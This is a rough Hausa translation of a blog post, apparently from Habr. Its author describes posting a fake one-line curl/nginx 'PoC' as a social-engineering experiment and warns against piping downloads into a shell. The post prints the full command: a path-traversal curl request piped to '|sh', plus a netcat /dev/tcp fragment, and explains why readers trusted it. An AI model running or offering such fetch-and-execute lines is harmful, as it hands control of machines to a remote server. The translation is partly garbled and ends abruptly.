Lura. fassara:
TL; DR: Kada a yi amfani da bututun fayil a cikin sh ko bash a kowane yanayi. Wannan babbar hanya ce don rasa sarrafa kwamfutarka.
Ina so in raba tare da ku ɗan gajeren labari game da amfani mai ban dariya na PoC wanda aka ƙirƙira a ranar 31 ga Mayu. Ya bayyana nan take yana mai da martani ga labarai daga
Bayan da na gama aiki da sabuwar dabarar ɓarna a cikin curl, na nakalto ainihin tweet ɗin kuma na “leaked PoC mai aiki” wanda ya ƙunshi layi ɗaya na lamba wanda da alama yana amfani da raunin da aka gano. Tabbas wannan shirme ne. Na ɗauka cewa nan da nan za a fallasa ni, kuma da kyau zan sami wasu retweets guda biyu (oh da kyau).
Duk da haka, na kasa tunanin abin da ya faru a gaba. Shahararriyar tweet dina ya karu. Abin mamaki, a halin yanzu (15:00 Moscow lokacin Yuni 1) 'yan mutane kaɗan sun gane cewa wannan karya ne. Mutane da yawa suna retweet shi ba tare da duba shi kwata-kwata (balle ma sha'awar kyawawan zanen ASCII da yake fitarwa).
Kawai kalli yadda yake da kyau!
Duk da yake duk waɗannan madaukai da launuka suna da kyau, a bayyane yake cewa dole ne mutane su kunna lamba akan injin su don ganin su. An yi sa'a, masu bincike suna aiki iri ɗaya, kuma tare da gaskiyar cewa ba na so in shiga cikin matsala ta doka, lambar da aka binne a cikin rukunin yanar gizona kawai tana yin kiran echo ba tare da ƙoƙarin shigar ko aiwatar da kowane ƙarin lambar ba.
Karamin digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - fiye da phishing kawai
Amincewa da sanin ya kamata su kasance babban sashi na wannan gwaji. Ina ganin su ne suka kai ga nasararsa. Layin umarni a sarari yana nuna tsaro ta hanyar komawa zuwa "127.0.0.1" (sanannen localhost). Localhost ana ɗaukarsa amintacce kuma bayanan da ke cikinsa ba zai taɓa barin kwamfutarka ba.
Sanin shine maɓalli na biyu SEE bangaren gwajin. Tunda masu sauraro da aka yi niyya da farko sun ƙunshi mutanen da suka saba da tushen tsaro na kwamfuta, yana da mahimmanci a ƙirƙira lambar ta yadda sassanta suka zama sananne kuma sun saba (saboda haka lafiya). Aron abubuwa na tsoffin dabarun amfani da hada su ta wata hanya da ba a saba gani ba ya tabbatar da samun nasara sosai.
Da ke ƙasa akwai cikakken bincike na mai layi ɗaya. Duk abin da ke cikin wannan jerin yana sawa yanayin kwaskwarima, kuma a zahiri babu abin da ake buƙata don ainihin aikinsa.
Wadanne abubuwa ne da gaske suke bukata? Wannan -gsS
, -O 0x0238f06a
, |sh
da uwar garken gidan yanar gizon kanta. Sabar gidan yanar gizon ba ta ƙunshi kowane umarni na mugunta ba, amma kawai ta yi amfani da zane-zane na ASCII ta amfani da umarni echo
a cikin rubutun da ke cikin index.html
. Lokacin da mai amfani ya shigar da layi tare da |sh
a tsakiya, index.html
lodawa da kuma kashe. Abin farin ciki, masu kula da sabar gidan yanar gizo ba su da wani mugun nufi.
-
../../../%00
- yana wakiltar wuce kundin adireshi; -
ngx_stream_module.so
- hanyar zuwa tsarin NGINX bazuwar; -
/bin/sh%00<'protocol:TCP'
- Muna tsammanin ƙaddamarwa/bin/sh
akan na'urar da aka yi niyya kuma tura fitarwa zuwa tashar TCP; -
-O 0x0238f06a#PLToffset
- sirrin sashi, kari#PLToffset
, don yin kama da ƙwaƙwalwar ajiya ko ta yaya ƙunshe a cikin PLT; -
|sh;
- wani muhimmin guntu. Muna buƙatar tura fitarwa zuwa sh/bash don aiwatar da lambar da ke fitowa daga sabar gidan yanar gizon da ke kai hari0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy wanda netcat ke nufi/dev/tcp/localhost
don komai ya sake zama lafiya. A gaskiya ma, ba ya yin kome kuma an haɗa shi a cikin layi don kyau.
Wannan yana ƙaddamar da ƙaddamar da rubutun layi ɗaya da tattaunawa game da bangarori na "injinin zamantakewa da lantarki" (rikitaccen phishing).
Kanfigareshan Sabar Yanar Gizo da Ma'auni
Tun da yawancin masu biyan kuɗi na infosec / hackers ne, na yanke shawarar sanya sabar gidan yanar gizon ta ɗan ƙara juriya ga maganganun "sha'awa" ta bangaren su, don kawai samari su sami wani abu da za su yi (kuma zai zama abin jin daɗi. kafa). Ba zan lissafta dukkan ramuka a nan ba tunda har yanzu gwajin na ci gaba, amma ga wasu abubuwa da uwar garken ke yi:
- Yana sa ido sosai akan yunƙurin rarrabawa akan wasu cibiyoyin sadarwar jama'a kuma yana maye gurbin samfoti daban-daban don ƙarfafa mai amfani don danna hanyar haɗin.
- Yana tura Chrome/Mozilla/Safari/da sauransu zuwa bidiyon talla na Thugcrowd maimakon nuna rubutun harsashi.
- Kallon ga BABBAN alamun kutsawa/Hacking, sannan ya fara tura buƙatun zuwa sabar NSA (ha!).
- Yana shigar da Trojan, da kuma tushen tushen BIOS, akan duk kwamfutoci waɗanda masu amfani da su ke ziyartar mai watsa shiri daga mai bincike na yau da kullun (kawai wasa!).
Ƙananan ɓangaren antimers
A wannan yanayin, kawai burina shine in mallaki wasu fasalulluka na Apache - musamman, ƙa'idodi masu kyau don tura buƙatun - kuma na yi tunani: me yasa?
NGINX Exploit (Gaskiya!)
Biyan kuɗi zuwa
source: www.habr.com